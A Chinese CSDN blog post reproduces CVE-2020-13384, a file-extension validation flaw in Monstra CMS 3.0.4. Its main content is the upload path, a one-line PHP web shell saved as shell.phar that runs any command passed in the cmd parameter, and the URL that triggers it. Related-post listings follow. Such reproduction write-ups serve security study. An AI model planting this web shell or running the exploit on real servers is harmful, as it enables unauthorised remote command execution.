monstra 文件上传 (CVE-2020-13384)

于 2024-07-22 09:52:13 发布
阅读量136 收藏
点赞数 3
分类专栏: # 命令执行 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140601368
版权

一、漏洞概述

Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。

二、影响范围

Monstra CMS 3.0.4

三、访问页面

四、漏洞复现

1、访问上传页面

/admin/index.php?id=filesmanager&path=uploads/

2、制作shell.phar文件上传。

<?php if(isset($_REQUEST['cmd'])){echo "<pre>";$cmd=($_REQUEST['cmd']);system($cmd);echo"</pre>";die;}?>

3、访问任意命令执行,链接/public/uploads/shell.phar?cmd=ls%20/tmp

风中追风-fzzf
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞)
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
CVE-2020-13384monstra 文件上传
Foreverlove112的博客
10-01 1763
CVE-2020-13384monstra 文件上传
monstra 文件上传(CVE-2020-13384)
m0_65150886的博客
01-02 625
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。6.编写test.phar文件。4.跳转到登录页面,随意注册。2.进行注册,随意填写就好。输入注册的用户名密码登录。1.访问ip:port。3.注册成功,点击登录。
【漏洞复现-monstra-文件上传】vulfocus/monstra_cve_2020_13384
10-10 1376
monstra-文件上传】后缀的理解
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CMS-CVE
最新发布
qq_49714982的博客
02-23 422
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0。WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0。WSO2 API Manager 2.2.0 及更高版本到 4.0.0。影响范围:jQuery Upload File
2020-11-11
wo_year的博客
11-11 136
初次写博客 打工人
Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)
sGanYu
05-04 2429
环境:Vulfocus 漏洞威胁分析平台 writeup 开启环境 随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意 直奔主题 漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin 点击上传文件 第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.
typesetter 文件上传CVE-2020-25790)
小小猪的博客
12-30 820
typesetter 文件上传CVE-2020-25790) 漏洞简介: Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 环境搭建: 在线环境 地址 漏洞复现: 访问首页 点击logged in 进入登录界面 账号密码: admin admin 创建一句话文件,压缩成压缩包 <?php @eval($...
vulhub漏洞复现-Apache Flink(CVE-2020-17518 CVE-2020-17519)任意文件上传/读取
遇事不决冲冲冲
11-01 3716
Apache Flink Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但同时也可以作为独立集群运行。 CVE-2020-17518 思路 Apache Flink 控制面板的Submit New Job处存在任意文件上传,利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置 漏洞复现 上传后抓包 进入后台查看 CV
Dolibarr 文件上传漏洞(CVE-2020-14209)
玄道的网安博客
12-18 819
简介 Dolibarr ERP&CRM是一个现代软件包,可帮助管理组织的活动(联系人,供应商,发票,订单,库存,议程等)。 这是一个开放源代码软件套件(用PHP编写,具有可选的JavaScript增强功能),适合中小型或大型公司,基金会和自由职业者使用。 漏洞概述 该漏洞允许低权权用户上传危险文件,从而导致任意代码执行。 影响版本 Dolibarr 11.0.5之前版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/Dolibarr/dolibarr
CVE-2020-25648:RHSA-2021:1384: nss 安全和BUG修复更新
hvang1988的专栏
10-22 3021
CVE-2020-25648:RHSA-2021:1384: nss 安全和BUG修复更新 1、RHSA-2021漏洞详情 RHSA-2021:1384: nss 安全和BUG修复更新-吾爱编程网 2、漏洞描述 漏洞编号:CVE-2020-25648 漏洞公告:Mozilla NSS拒绝服务漏洞 漏洞描述:NSS是美国Mozilla基金会的一个底层密码学库。该库支持多种加密算法,并且 Firefox 浏览器的TLS实现基于该库。 NSS 3.58之前的版本存在安全漏洞,该漏洞源于NSS处理CCS
CVE-2020-13384
09-13
CVE-2020-13384是一个与monstra文件上传相关的漏洞。根据引用中提供的信息,该漏洞的描述、影响范围、漏洞复现和漏洞修复方法如下: 0x01 漏洞描述: CVE-2020-13384monstra文件上传功能中存在的漏洞。该漏洞可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值